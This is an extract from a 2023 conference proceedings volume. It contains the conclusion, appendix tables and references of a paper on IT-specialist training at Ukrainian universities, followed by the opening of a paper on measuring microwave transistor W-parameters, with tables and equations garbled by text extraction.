Kharkiv National University of Radio Electronics ranks third in the contingent of students and occupies 6.9% of the market for educational services in the IT sector. The university is the leader in the specialty number 123 and occupies 9.9% of the total contingent of students (9.6% of the market of bachelors and 10.4% of the market of master’s degree in this specialty). The universities that are among the top three IT professionals are quite powerful and efficient, as evidenced by their high ranking. Thus, in the Ukrainian ranking of higher education institutions TOP-200 during 2018–2022, the National Technical University of Ukraine “Igor Sikorsky Kyiv Polytechnic Institute” took the first place in 2018 and 2020 and second place in 2019 and 2021–2022 (Rating 2022). Lviv Polytechnic National University in the TOP-200 ranked fourth in 2019, 2021 and 2022 and fifth – in 2018 and 2020. Kharkiv National University of Radio Electronics in the TOP-200 ranked 9th in 2020 and 2022 and up to 23d in 2018. In addition, all leading universities became part of eleven Ukrainian universities, which in 2022 were included in the QS World University Rankings 2023 (QS 2022). At the same time, the first two universities of our ranking were consistently included in the QS World University Rankings 2020–2022. Thus, it can be argued that the high demand among entrants for educational services of Ukrainian universities-leaders in the IT field is supported by the recognition of these higher education institutions at the global level. The high rating of universities in the educational environment of Ukraine and the world is a guarantee of strong demand for its services among applicants, as well as opportunities to select the best of them (Table 3, Appendices). Based on the information systematized in the databases of the Competition Information System and the Statistics of Admission Companies portal, the table compares the main indicators of admission companies in 2021 and 2020 for the three leading universities in IT education in Ukraine. In order to ensure comparability of data, the information is given for one, but the most common in the country specialty number 122. In order to emphasize the difference in the values of the leading universities, the University of Cherkasy, namely Cherkasy State Technological University, has been also added to the table. We can conclude that for the most part there are positive changes in the values of all indicators and, most importantly, the leading universities attract the most talented applicants and therefore we can predict that graduates of these institutions of higher education will have the highest level of competitiveness in Ukraine and the world. A detailed analysis of the content of educational programs of Ukrainian leaders in the IT field in the specialty number 122 at the bachelor’s level (Table 4, Appendices) has concluded that all three universities train equivalent IT professionals with basic and specialized knowledge in the field of intellectual technologies and information systems. Confirmation of this thesis can be considered the coincidence of up to 50% of the names of disciplines of professional and practical training of IT professionals, close in content to the list of knowledge expected to be acquired by an IT specialist based on learning outcomes and similar employment opportunities. It should also be noted the features of each of the considered programs, which is mainly related to their specific focuses, professional orientation, resource characteristics and capabilities of the educational institution, which they use in the training of IT professionals. Graduates of these universities are proud of Ukraine, they are part of the elite of IT professionals and
The Potential of Higher Education in Ukraine
587
they have a high responsibility to find ways not only to quickly compensate for all lost technologies in various spheres of economic activity through hostilities, bombing and occupation, but also to significantly increase technical and technological level of the country in all spheres of economic activity. At the same time, in order to stimulate continuous development, Ukraine’s IT education should focus on the world’s best practices. According to QS World University Rankings 2023 (QS 2022), the first place in the world among universities is occupied by the Massachusetts Institute of Technology, which specializes in, among others, the IT field. At the same time, more important is the fact that during 2019–2022 this university took the first place in the Graduate Employability Ranking (QS Graduate 2022). That is, the level of employment in the profession and values in the global labor market graduates of the Massachusetts Institute of Technology have the highest performance in the world. A study of the Massachusetts Institute of Technology’s bachelor’s degree programs in computer science has revealed their clear application, which is one of the conditions for high demand for specialists. Thus, in 2022 the institution has opened six bachelor’s programs: Electrical Science and Engineering; Electrical Engineering and Computer Science; Computer Science and Engineering; Computer Science and Molecular Biology; Computation and Cognition; Urban Science and Planning with Computer Science; Computer Science, Economics, and Data Science (Massachusetts 2022). Given the degree of potential needs of Ukraine’s economy in the postwar period, we can predict that specialists in such specialties would be in high demand. The peculiarities of training IT specialists at the Massachusetts Institute of Technology are the orientation in the educational process on such principles as innovation, flexibility, ingenuity, practical orientation and modeling and abstract thinking. Among the courses that fill the curriculum for each bachelor’s program, 10–15% of the courses by name coincide with the disciplines taught by Ukrainian universities-leaders in the IT field in specialty number 122. Moreover, the coincidence is observed with the block of disciplines that are the same for all leading universities in IT education in Ukraine. However, most courses at the Massachusetts Institute of Technology are applied, namely: Software Performance Engineering; Introduction to Design Thinking and Innovation in Engineering; Design Thinking and Innovation Leadership for Engineers; Engineering Leadership Lab. Disciplines of this kind should be introduced at least in the sample of disciplines. The practical orientation of education at the Massachusetts Institute of Technology is ensured not so much by the choice of practical areas of study, graduates of which will be in demand on the labor market, but by close cooperation with business in conducting scientific research. Thus, the Massachusetts Institute of Technology cooperates with more than 60 centers, laboratories and programs of world importance, which provide an opportunity for practical consolidation of the knowledge acquired by students and scientific verification of all declared hypotheses in practice. Among such laboratories and centers should be mentioned CSAIL, CISR, J-CLINIC, J-PAL, J-WEL, J-WAFS, CBA, MTL, SMART and others. The importance of training a sufficient number of highly qualified IT specialists is confirmed by the annual growing need of the Ukrainian economy for experienced and competent specialists. Thus, according to GlobalLogic, over the past three years
588
O. Zakharova and L. Prodanova
the annual need for IT professionals in the labor market of Ukraine has increased by an average of 30% and in 2021 reached a level of 54 thousand people (IT 2021). In 2022, due to Russia’s military aggression, the labor market suffers a significant decline, but even if we focus on the needs of the previous year, higher education institutions in Ukraine will not be able to fulfill it, as currently only 8,172 people in the country are studying for a master’s degree, 15% of available requests from employers (Register 2022). At the same time, the vast majority of undergraduates do not yet have practical experience in the IT field and therefore the moment of their employment may be delayed in time, which will further exacerbate the situation in the IT sector of Ukraine’s labor market. Therefore, the way out of the situation should be a clear focus of educational programs on market needs and strengthening their practical component through close cooperation with stakeholders throughout the training period. An important condition should also be the creation of specialized landfills, branches and research laboratories on the basis of Ukrainian higher education institutions or stakeholder enterprises. The purpose of the functioning of such formations should be to work out and consolidate theoretical knowledge in practice, students to solve tasks at the request of enterprises, to involve students in the implementation of both simulation and real IT projects. This will increase the level of employment of graduates in the specialty and the demand of applicants for the services of higher education institutions not only in leading universities, but throughout the country. In addition, the student’s active participation during training in the activities of specialized laboratories will increase the level of his value in the labor market, expand his professional resume and increase his status from Trainee to Junior, or even to Middle. In the current crisis of the Ukrainian economy, the motivation of IT professionals is based on the level of wages. Today, the average salary of an IT specialist in Ukraine is UAH 20,000 (work 2022), while in Moldova and Armenia the salary level in the IT sector starts from UAH 40,000, and in Cyprus the average salary of IT specialists ranges from UAH 135,000 for specialists in Middle status and can reach up to UAH 250,000 for specialists in Senior status (What 2022). At the moment, experienced IT specialists of Ukraine have a high chance of entering the world market of IT on the basis of outsourcing. At the same time, the imperfection of Ukrainian legislation in the IT sphere and unregulated procedures for the use of outsourcing at the regulatory level cause significant difficulties in choosing a model of work and drive Ukrainian IT professionals into the shadow sector. If at the regulatory level during the year we can at least get closer to solving this problem, it will be an impetus for the formalization of IT professionals in the labor market, expanding opportunities for their involvement in economic recovery projects in the postwar period, increasing innovation growth and the development of smart economy projects at the regional and national levels.
The Potential of Higher Education in Ukraine
589
The role of the IT sector in filling the country’s budget due to export revenues is especially important. According to the calculations and forecasts of GlobalLogic specialists, in the current year 2022, Ukraine will be able to reach the level of export revenues from the IT sector at the level of 2021, i.e., not less than $7 billion (The IT 2022). As a confirmation of this possibility, experts cite the level of revenues provided by the industry in the first quarter of 2022, namely $2 billion, which has become a record level for the functioning of the IT sphere of Ukraine. Experts also claim that today the IT sector of Ukraine loses up to $12 million a month due to a significant shortage of specialists (The IT 2022). In the conditions of war, the growth of revenues from the operation of the IT industry will allow to increase the defense capability of the Ukrainian army and will contribute to providing the population of the country with everything necessary. And in the post-war period, export revenues from the IT sector should become the basis for the recovery of Ukraine’s economy, which has suffered from the actions of the aggressor. In addition, today the country’s economy needs the introduction of new innovative approaches to management, automation and computerization of production processes, access to new standards of activity in all areas with the involvement of scientific research results. Therefore, any efforts aimed at increasing the number of competitive, highly motivated and competent IT specialists in the labor market of Ukraine should become a lever for increasing the speed of post-war recovery of the country’s economy.
4 Conclusions The study based on the analysis of the ability of higher education institutions in Ukraine to produce a sufficient number of highly professional and competitive IT professionals allows to substantiate the current opportunities for rapid recovery and increase of technical, technological and innovative level of Ukraine’s economy in the postwar period. The factors influencing the level of motivation of Ukrainian IT specialists to use their own accumulated knowledge and skills in the direction of increasing the competitiveness of Ukraine’s economy are substantiated. Comparison of the focus and content of educational programs of leading universities in the training of IT professionals in Ukraine and leading countries around the world allows to formulate the main vectors of further development of IT education in Ukraine.
590
O. Zakharova and L. Prodanova
5 Appendices
Table 1. Territorial distribution and characteristics of higher education institutions of Ukraine that provide training for IT professionals City
Number of
The general
The average
The number
Code of the
The number
The
The average
The smallest
The largest
higher
contingent
number of
of
specialty
of
number
number of
contingent of
contingent of
education
of students
students in
specialties
within the
educational
of
students in
students in a
students in a
institutions
of higher
the
within the
field of
institutions
students
the most
higher
higher
where
education
institution,
field of
knowledge
that provide
who
common
education
education
specialists
within the
persons
knowledge
№12,
services in
acquire
specialty in
institution
institution
in the field
field of
№12 that
which has
the city in
the most
the city, per
that provides
that provides
of
knowledge
can be
the largest
the most
common
one higher
educational
educational
knowledge
№12,
obtained in
number of
common
specialty
education
services in
services in
are trained
persons
the city
higher
specialty,
in the
institution,
the most
the most
education
units
city,
persons
common
common
specialty in
specialty in
the city,
the city,
persons
persons 1626
№12, units
in the city
persons
(121–126)
Kyiv
35
24646
529
6
122
29
7603
262
2
Kharkiv
14
14026
1002
6
122
9
4598
511
15
1860
Lviv
11
9400
855
6
122
10
4804
480
43
2438
Odesa
11
4783
435
6
122
8
2100
263
44
953
Dnipro
10
5272
528
6
122
10
2086
209
82
545
Zaporizhzhia
8
2264
283
6
121
5
1097
219
22
471
Mykolaiv
8
1622
203
6
122
5
601
120
4
286
Poltava
6
1077
180
4
122
4
548
137
18
257
Ivano-Frankivsk
5
1629
326
4
121
5
925
185
66
486
Lutsk
5
1067
213
4
122
3
319
106
38
158
Cherkasy
5
854
171
6
121
3
273
91
3
154
Ternopil
4
2538
635
6
122
4
940
235
20
360
Vinnytsia
4
2317
579
6
122
3
800
267
147
364
Zhytomyr
4
1249
312
6
121
1
573
573
–
–
Kryvyi Rih
4
562
141
3
121
2
356
178
150
206
Sumy
3
981
327
3
122
2
848
424
22
826
Chernihiv
3
785
262
4
123
1
422
422
–
–
Rivne
3
682
227
4
122
3
306
102
50
173
Kropyvnytskyi
3
525
175
3
123
1
234
234
–
–
Khmelnytskyi
2
1388
694
5
123
2
494
247
75
419
Chernivtsi
2
1095
547
6
122
2
495
248
98
397
Uzhhorod
1
919
919
6
121
1
376
376
–
–
Source: Register 2022
The Potential of Higher Education in Ukraine
591
Table 2. Characteristics of higher education institutions that are leaders in Ukraine in the contingent of IT graduates Institution of higher education
The general contingent of applicants for higher education within the field of knowledge №12, persons
Contingent of applicants for higher education in the specialty, % of the total contingent of applicants within the specialty 121 Software Engineering
122 Computer Science
123 Computer Engineering
124 System Analysis
125 Cybersecurity
126 Information Systems and Technologies
National Technical University of Ukraine “Igor Sikorsky Kyiv Polytechnic Institute”
7118
10.8
5.7
7.8
18.4
5.4
23.1
Lviv Polytechnic National University
5848
3.6
8.5
6.9
9.9
9.5
7.9
Kharkiv National University of Radio Electronics
5605
6.1
6.5
9.9
2.4
9.1
2.0
Source: Register 2022
Table 3. Characteristics of the leading universities in IT education in Ukraine according to the indicators of introductory companies in 2021 and 2020 in the specialty 122 Computer Science at the bachelor’s level of full-time education Institution of higher education
National Technical University of Ukraine “Igor Sikorsky Kyiv Polytechnic Institute”
The average rating score of those credited to the budget by specialty
The average rating score of those enrolled in the contract by specialty
Number of applications submitted
Enrolled students in the budget form of education, persons
Competition for one budget place, persons
2021
2020
2021
2020
2021
2020
2021
2020
2021
2020
189.35
192.42
174.92
170.96
2583
2054
94
102
13.12
12.45
(continued)
592
O. Zakharova and L. Prodanova Table 3. (continued)
Institution of higher education
The average rating score of those credited to the budget by specialty
The average rating score of those enrolled in the contract by specialty
Number of applications submitted
Enrolled students in the budget form of education, persons
Competition for one budget place, persons
2021
2020
2021
2020
2021
2020
2021
2020
2021
2020
Lviv Polytechnic National University
192.38
190.26
171.56
164.44
2462
2070
305
272
6.21
7.61
Kharkiv National University of Radio Electronics
191.22
190.16
161.85
160.56
1212
937
59
52
13.03
13.46
Cherkasy State Technological University
188.52
164.16
146.44
149.67
152
64
5
3
18.00
15.67
Source: Information 2022 Table 4. The main provisions of educational programs within the specialty 122 Computer Science Characteristics of the educational program
National Technical University of Ukraine “Igor Sikorsky Kyiv Polytechnic Institute”
Lviv Polytechnic National University
Kharkiv National University of Radio Electronics
1
2
3
4
Title
Intelligent Service-Oriented Distributed Computing
Computer Science
Computer Science
Goal
Training of specialists capable of solving problems in the field of computer science and information technology related to the development and maintenance of high-performance software of complex information systems and technological complexes, using intelligent distributed computing technologies and resources of modern computing environments
Acquisition of knowledge, skills and understanding related to software development, design of information systems, networks and computer programs, information technology tools, computer design systems, computer intelligent decision-making systems, computer design and security features in the field of information technology
Training of highly qualified specialists who have a system of knowledge in the field of information technology, have mastered modern research in computer science, are able to formulate and solve practical problems using fundamental and special methods and technologies of computer science and technology
(continued)
The Potential of Higher Education in Ukraine
593
Table 4. (continued) Characteristics of the educational program
National Technical University of Ukraine “Igor Sikorsky Kyiv Polytechnic Institute”
Lviv Polytechnic National University
Kharkiv National University of Radio Electronics
Features
Application of the latest concepts and models of modern theory and practice of building algorithmic, mathematical, software and hardware of computer systems
Develops promising areas for modeling the development of modern software packages, in-depth knowledge of analysis and synthesis of data and knowledge in the early stages of building information systems. Structural and object-oriented approaches to software system design are being developed
Study of the theoretical foundations of computer science, acquisition of competencies in the field of information technology, tools for obtaining, presenting, processing, analysis, transmission and storage of data in intelligent information systems
Disciplines of professional and practical training
Object-oriented programming Systems modeling Methods and systems of artificial intelligence Computer networks Technologies for creating software services Information systems security Operating Systems Algorithmization and programming Database systems Fundamentals of systems analysis Information systems design Algorithms and data structures Computer systems architecture Optimization methods Parallel calculations
Object-oriented programming Computer circuitry and computer architecture Computer networks Technology for creating software products Information protection technologies Algorithms and data structures Web technologies Software quality and testing Client-server programming Development and administration of databases Information theory and coding Interfaces and data protocols Cross-platform programming Internet technology Development of computer games Data warehouse technologies
Object-oriented programming Systems modeling Methods and systems of artificial intelligence Computer networks Information protection technologies Operating systems and system programming Computer circuitry and computer architecture Technology of creating software systems Web technologies and web design Computer aided design technologies Cross-platform programming Design of information systems IT project management Distributed systems and parallel computing technologies
(continued)
594
O. Zakharova and L. Prodanova Table 4. (continued)
Characteristics of the educational program
National Technical University of Ukraine “Igor Sikorsky Kyiv Polytechnic Institute”
Lviv Polytechnic National University
Kharkiv National University of Radio Electronics
1
2
3
4
Knowledge acquired by an IT specialist
Preparing graduates for successful professional activities in the field of computer technology on the basis of in-depth basic training, which includes, inter alia, the study of algorithms, artificial intelligence, intelligent distributed (cloud, fog and serverless) computing technologies, and the ability to quickly master new technologies and systems
Principles of development and operation of information systems Application software development technologies; distributed systems and parallel computing Computer Engineering Methods of data mining and decision making; support teamwork Creation of local and network databases and knowledge, Internet services Use of modern graphic modeling and design tools for designing Web-oriented systems Execution of automated information processing
Principles of the exchange and processing of information in various systems. Methods of organization of information storage, technology for the development, implementation and modernization of information systems; programming languages, databases, computer networks, system analysis. Designing and creating new software and information systems. Management of IT projects. Development of Internet sites based on the knowledge of Internet technologies, Web technologies. Development of computer games. Development of systems of corporate level. Development of mobile applications for Android, Windows Phone, iOS. Development and administration of databases. Software Testing
Employment opportunities
Database administrator. Engineer of automated production management systems. Computer systems engineer. Computer software engineer
Information technology specialist. Developer of information systems. System administrator. Information and computer network administrator. Specialist in maintenance and repair of computer equipment. Database administrator. Informatization consultant. Computer systems engineer
Business analyst. Position of analyst of computer systems. Project Manager. The developer of intellectual and information systems. System Architect. Java Programmer, C++, C#, PHP. Specialist in QualityControl, QualityAssurance. Developer and administrator of MySQL, Oracle databases. System Administrator
Source: National 2022; Lviv 2022; Kharkiv 2022
References Iden, J., Langeland, L.: Setting the stage for a successful ITIL adoption: a Delphi study of IT experts in the Norwegian Armed Forces. Inf. Syst. Manag. 27(2), 103–112 (2010)
The Potential of Higher Education in Ukraine
595
Information System Competition. Introductory Company 2021–2022 (2022). http://www.vstup. info IT in Ukraine: Figures, Opportunities, and Challenges. DLF (2021). https://dlf.ua/en/it-in-ukrainefigures-opportunities-and-challenges/ Kharkiv National University of Radio Electronics. Specialty 122 – Computer Science (2022). https://nure.ua/en/applicants/specialties-and-specialization/specialty-122-computer-science Lviv Polytechnic National University. Specialty 122 – Computer Science (2022). http://directory. lpnu.ua/majors/IBIT/6.122.00.00/8/2022/ua/full Massachusetts Institute of Technology. Computer Science (2022). https://www.eecs.mit.edu/res earch/computer-science/ National Technical University of Ukraine “Igor Sikorsky Kyiv Polytechnic Institute”. Intelligent Service-Oriented Distributed Computing (2022). https://osvita.kpi.ua/sites/default/files/ opfiles/122_OPPB_ISORO_2022.pdf Opel, S., Netzer, C.M., Desel, J.: AsTRA – an assessment tool for recognition and adaptation of prior professional experience and vocational training. IFIP Adv. Inf. Commun. Technol. 642, 222–233 (2022) Pasichnyk, V., Kunanets, N.: IT education and IT business in Ukraine: responses to the modern challenges. In: 10th International Scientific and Technical Conference on Computer Sciences and Information Technologies, pp. 48–51. Lviv (2015) Portrait of an IT specialist – 2019. Infographic (2019). https://dou.ua/lenta/articles/portrait-2019/ Pröbster, M., Hermann, J., Marsden, N.: Digital training in tech – a matter of gender? In: ACM International Conference Proceeding Series, pp. 11–18 (2018) Proskura, S.L., Lytvynova, S.G.: Organization of independent studying of future bachelors in computer science within higher education institutions of Ukraine. In: Proceedings of the 14th International Conference on ICT in Education, Research and Industrial Applications. Integration, Harmonization and Knowledge Transfer, vol. II: Workshops, 2104, pp. 348–358 (2018) QS Graduate Employability Rankings 2022 (2022). https://www.topuniversities.com/universityrankings/employability-rankings/2022 QS World University Rankings 2023: Top Global Universities (2022). https://www.topuniversit ies.com/university-rankings/world-university-rankings/2023 Rating of Ukrainian Higher Education Institutions “TOP-200 Ukraine” for 2018–2022 (2022). http://osvita.ua/vnz/rating/86578/ Register of Subjects of Educational Activity. The Only State Electronic Database on Education (2022). https://info.edbo.gov.ua/ Resolution of the Cabinet of Ministers of Ukraine “On approval of the list of branches of knowledge and specialties in which the training of higher education is carried out” №266 from 29.04.2015. http://vnz.org.ua/zakonodavstvo/101-perelik-galuzej-znan-i-spetsialnostej Statistics of introductory companies. Introduction 2012–2021. http://abit-poisk.org.ua/stat The IT Industry May Reach Last Year’s Figures. GlobalLogic Named the Terms (2022). https:// www.globallogic.com/ua/about/news/it-industry-export-income/ Ukraine IT Report 2021. IT Ukraine Association (2021). https://drive.google.com/file/d/1LujaT 9pHEGhgpRRojfnlZgQikkyiIlbE/view What are the salaries of IT professionals abroad? (2022). https://zakordon.24tv.ua/yaki-sumi-otr imuyut-it-fahivtsi-za-kordonom_n1703701 Wiggberg, M., et al.: Effective reskilling of foreign-born people at universities – the software development academy. IEEE Access 10, 24556–24565 (2022) work.ua (2022). https://www.work.ua/ru/jobs-it/
Information Security
Standard and Nonstandard W-parameters of Microwave Active Quadripole on a Bipolar Transistor for Devices of Infocommunication Systems Andriy Semenov1(B) , Oleksandr Voznyak2 , Andrii Rudyk3 , Olena Semenova1 , Pavlo Kulakov4 , and Anna Kulakova5 1 Faculty for Infocommunications, Radioelectronics and Nanosystems, Vinnytsia National
Technical University, 95 Khmelnytske Shose St., Vinnytsia 21021, Ukraine [email protected] 2 Department of Electrical Engineering Systems, Technologies and Automation On Agro-Industrial Complex, Vinnytsia National Agrarian University, 3 Soniachna St., Vinnitsia 21008, Ukraine 3 Department of Automation, Electrical Engineering and Computer-Integrated Technologies, National University of Water and Environmental Engineering, 11 Soborna St., Rivne 33028, Ukraine [email protected] 4 Department of Information Technologies, Uman National University of Horticulture, 1 Institutska St., Uman, Cherkassy Region 20305, Ukraine [email protected] 5 Faculty for Computer Systems and Automation, Vinnytsia National Technical University, 95 Khmelnytske Shose St., Vinnytsia 21021, Ukraine
Abstract. Characteristics of devices of the microwave range can be improved by applying both new elemental base and new circuitry decisions. Perspective direction is applying reactive properties of transistors and transistor structures with negative resistance for constructing information-measuring systems, operational and computing devices of microwave range. In order to substantiate proposed methods experimental research results should be compared using the proposed methods and measuring equipment for W-parameters of real potentially unstable quadripoles. Bipolar transistors having potential instability in a wide frequency range are suggested to be used as such quadripoles. In the paper mathematical models of W-parameters for such structures are developed and their parameters are estimated in frequency range. Keywords: W-parameters · active quadripole · bipolar transistor · electrical parameters · equivalent circuit · mathematical model · microwave
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 599–618, 2023. https://doi.org/10.1007/978-3-031-35467-0_36
600
A. Semenov et al.
1 Introduction The active quadrupole is a transistor model [1, 2]. Its W-parameters can be determined either experimentally for specific conditions [3, 4], or calculated by means of a physical circuit of transistor substitution [5, 6]. In most cases, the calculation path is more acceptable because it allows to obtain analytical expressions for the quadripole, which is important when analyzing the influence of various factors on the characteristics of the studied scheme [7, 8]. Physical circuits for a bipolar transistor are obtained by considering the charge transfer processes in the transistor [9, 10]. They can be found in a large amount of articles [5, 11]. Depending on construction method of the so-called theoretical transistor model, which describes the processes of carries drift and diffusion in the base field, there are U- and T-shaped circuits. The U-shaped circuit was proposed by Giacoletto for drift transistors and later justified for drift transistors. Its advantage is the known simplicity of its properties simulation in a wide frequency range [12]. The internal elements of the circuit modeling the processes of accumulation, recombination and transfer of charge carriers across the base area [9]. The inclusion of external elements in the equivalent circuit is explained by the transistors design [10]. The inertial properties of transistors appear at relatively low frequencies and should be taken into account in all transistors operating range [3, 4]. The theoretical model is valid for frequencies f ≤ 2fT (where fT is the limit frequency) [12, 13]. At higher frequencies, it is necessary to take into account the parasitic reactive parameters of real transistors, first of all, the inductance of the terminals [7]. A T-type equivalent transistor circuit in the simplified version was proposed by Pritchard R.L. [14]. It has several varieties differing in configuration of the circuit, consisting of the base material resistance and the collector junction capacity [14]. Upon careful examination, you will notice the T- and U-shaped equivalent circuits of the transistor differs only in configuration of their internal part that is a theoretical model [14]. At high frequencies, the U- and T- circuits are not exact mutual equivalents. This is due to approximation used in the transition from one circuit to another. However, frequency characteristics of the circuits are very close [13, 14]. Each of them models processes in the transistor with approximately the same accuracy, and in this sense they are equivalent [13, 14]. Electrical industry facilities are making great efforts to improve quality and efficiency of their products. Measuring semiconductor parameters is paid a great attention because they play a crucial role when developing and constructing electronic equipment. It is especially difficult to define semiconductor device parameters in microwave range, being a range of potential instability. That is because one needs to measure the parameters in the operating frequency range to obtain necessary information. That is why developing new more efficient methods and means to measure parameters of potentially unstable semiconductor devices is a challenging task. The aim of the work is to develop methods determining the W-parameters of potentially unstable microwave active multipoles. The main tasks of the work is 1) to determine transistor quadripole parameters in the frequency range of their potential instability; 2) to estimate adequacy of the proposed methods using the numerical experiment; 3) to discuss the result and to conclude taking into account the results.
Standard and Nonstandard W-parameters
601
To analyze the parameters of the bipolar transistor as an active quadrupole, we use an equivalent T-shaped substitution circuit [14]. Based on the fact that the dimensions of modern microwave transistor structures do not exceed 0.01 minimum wavelength, the internal structure of the microwave transistor can be represented by a circuit consisting of lumped elements. There are many such equivalent circuits of varying degrees of accuracy [15, 16]. The practice shows, the refinement of an equivalent circuit does not significantly improve the accuracy of calculations, due to the low accuracy of determining the parameters of its elements. In addition, the calculation formulas obtained from the complex circuit are cumbersome, difficult to calculate and have no clarity. It is necessary to introduce certain assumptions to simplify formulas, which also leads to decrease in accuracy of calculations. In this regard, it is advisable to choose a relatively simple physical equivalent circuit of the transistor, which parameters can be coordinated with more accurate experimental characteristics, that is, to change the parameters of the equivalent circuit so that its output electrical parameters (Y-parameters) correspond to the experimental ones [11]. In view of the above, we use the T-shaped equivalent Pritchard circuit (Fig. 1), supplemented by the reactive elements of the case and the terminals of the transistor [14, 17].
Fig. 1. T-shaped equivalent circuit of the bipolar transistor [14, 17]. In this circuit: h21 is the current ratio of the transistor as measured in the common base circuit; CC1 and CC2 are active and passive capacities of the collector junction; CE and rE are the barrier capacitance and differential resistance of the emitter junction; LE, LB, LC are inductances of emitter, base and collector terminals; C1, C2, C3 are capacities between base, emitter and collector terminals and the case (ground).
602
A. Semenov et al.
2 Estimating Nonstandard W-parameters of Microwave Active Quadripole on a Bipolar Transistor The procedure for determining the parameters of this circuit is given in [14, 15]. To perform a numerical experiment to determine the quadrupole parameter system: Re(W12 W21 ), Im(W12 W21 ), W11 , W22 , |W12 |, |W21 |, which are proposed to be used as a system of nonstandard quadripole parameters [18–20], it is necessary to derive calculation formulas and sequences for determining elements of the nonstandard system. Let’s use the equivalent circuit of the bipolar transistor and consider a case of switching on the transistor in the circuit with a common collector (Fig. 2), which is potentially unstable to the maximum generation frequency of the transistor fmax [15].
Fig. 2. Quadripole circuit on a common-collector bipolar transistor. The values of the reactive elements of terminals C1 , C2 , C3 , LE , LB , LC in Fig. 1 depend on construction of the transistor and the method of its installation in the circuit. Therefore it is advisable to consider them to be external to the quadripole and to give rise to the WG generator imitations and the WL load.
Consider an equivalent circuit if the transistor is switched on according to the common collector circuit. The inductance of the common output has a significant influence on the quadripole parameters. However, to simplify the analysis in the first stage, it can be neglected. Given the assumptions made, the equivalent diagram (Fig. 2) will take the form shown in Fig. 3. We write down the conductivity matrix for this circuit [14, 17]: Y (z + rB )/z · rB Y . −1/rB |YC | = 11C 12C = (1) Y21C Y22C −1/rB (1 − h21 ) (z + rB ) z · rB (1 − h21 ) Substituting expressions for elements of the matrix (1) into expressions for input and output conductivity [15, 16], after simple mathematical transformations we find
Standard and Nonstandard W-parameters
603
Fig. 3. Converted equivalent circuit of the bipolar transistor with common collector, where zA = rE 1 1 jωC , z = jωC , zE = 1+jωr C . C1
E E
C2
expressions for the real and imaginary components of the input and output quadripoles conductivity: 1 BL Wm2 + 1 − Wm2 QL − 2 , rB BL2 Wm2 + 1 − Wm2 QL rB BL − 1 + 2m QL m = ωm m CC2 + 2 , BL2 QL2 + 1 − 2m QL rB 2m QG − 1 − IG2 2m Qm 1 = − , 2 rB Q2 2 + 1 − I 2 2 (1 + B )r
Re YIN .C =
Im YIN .C
Re YOUT .C
G
G
m
(3)
(4)
B
⎞ 2 2 2 1 − IG m + QG QG m 1 ⎝ ⎠, = ωm m CC1 − 1+ m rB 2 2 + 1 − I 2 2 2 (1 + B ) m Qm r G m ⎛
Im YOUT .C
m
G
(2)
(5)
where BL = 1 + rB (m CC1 + Re YL ), QL = m CB (CL + CC1 ), BG = rB Re YG ; IG = m2 CC2 LG , QG = m LG (1 + BG )/rB , m is a transistor cutoff frequency. Given the elements of the matrix (1), the maximum attainable power transfer coefficient at the stability limit is [15] 2 ω2 + ωm KmS = . (6) ω Similarly, we obtain expressions for the input and output conductivity for the transistor circuits with a common base and a common emitter. For this, the formulas are
604
A. Semenov et al.
used [21] and the already known conductivity matrix |Y C | (1). Then we calculate the values for the input and output quadripoles conductivity, while using equations of the immittance circle, determine the parameters ρIN , ρOUT , i W IN , W OUT [18]. The parameters found are sufficient to numerically determine the nonstandard quadripole parameter system [17] using formulas (7) [22] ⎧ ρ Re Wg ⎪ ⎪ Re W22 = IN , ⎪ ⎪ ⎪ ρIN − ρIN ⎪ ⎪ ⎪ ⎪ ⎪ ρIN ρIN ρIN ⎪ ⎪ Re Wg , Re W22 = ⎪ Re W11 = ⎪ ⎪ ρOUT ρOUT ρIN − ρIN ⎪ ⎪ ⎪ ⎪ ⎪ 2ρIN ρIN ⎪ ⎪ Re Wg , |W | = 2ρ W Re W = ⎪ 12 21 IN 22 ⎪ ⎪ ρIN − ρIN ⎪ ⎪ ⎪ ⎨ Re(W12 W21 ) = 2Re W22 (W11 − WIN .A ), (7) ⎪ ⎪ ⎪ Im(W12 W21 ) = |W12 W21 |2 − Re2 (W12 W21 ), ⎪ ⎪ ⎪ ⎪ ⎪ ⎪ (W12 W21 ) ⎪ ⎪ Im(W12 W21 ) = |W12 W21 | sin arccos Re , ⎪ ⎪ |W12 W21 | ⎪ ⎪ ⎪ ⎪ ⎪ Im(W12 W21 ) ⎪ ⎪ Im W11 = Im WIN .B + , ⎪ ⎪ 2 Re W22 ⎪ ⎪ ⎪ ⎪ ⎪ Im(W12 W21 ) ⎪ ⎩ Im W22 = Im WOUT .B + . 2 Re W11
3 Experimental Testing Nonstandard W-parameters of Microwave Active Quadripole on a Bipolar Transistor The block diagram of experimental equipment for measuring the microwave quadripole W-parameters is shown in Fig. 4 [22]. The results of calculations and experimental values obtained using the methodology [23, 24] are presented in Fig. 5, 6, 7, 8 and 9. As can be seen from the comparison of the obtained theoretical and experimental results in the frequency range 0,1–3 GHz, the discrepancy of the results does not exceed 15%, this confirms the adequacy of the developed methodology [25].
4 Graphic-Analytical Method for Determining of Standard Microwave W-parameters of Active Quadripole Graphical methods for determining of the equivalent microwave parameters of the quadripole according to the results of measurement are more convenient than analytical methods. With a mathematical equation and its graphical interpretation, it is relatively easy to determine the required values, solving the problem by graphic techniques. There are several methods of graphic representation of relations that characterize complete
Standard and Nonstandard W-parameters
605
Fig. 4. Block diagram of the experimental equipment for measuring the nonstandard Wparameters of the active quadripole on a bipolar transistor: MG is a measuring generator; V is a solenoid valve; R is a reflectometer; T is a tee; P is a phase rotator; IQ is the investigated quadripole, fixed in a special holder; P1 and P2 are two short-circuiting pistons [22].
Fig. 5. Frequency dependences of the nonstandard quadripole transistor W-parameters |Y12 |: are theoretical data and are experimental data.
complex resistance (conductivity). The following two are most convenient: 1) circular diagram of the impedance in rectangular coordinates [26]; 2) a circular diagram of the impedance in polar coordinates, proposed for the first time by Smith [27]. One of the ways to improve the effectiveness of measuring the semiconductor devices quality
606
A. Semenov et al.
Fig. 6. Frequency dependences of the nonstandard quadripole transistor W-parameters |Y21 |: are theoretical data and are experimental data.
Fig. 7. Frequency dependences of the nonstandard quadripole transistor W-parameters Re(Y12 Y21 ): are theoretical data and are experimental data.
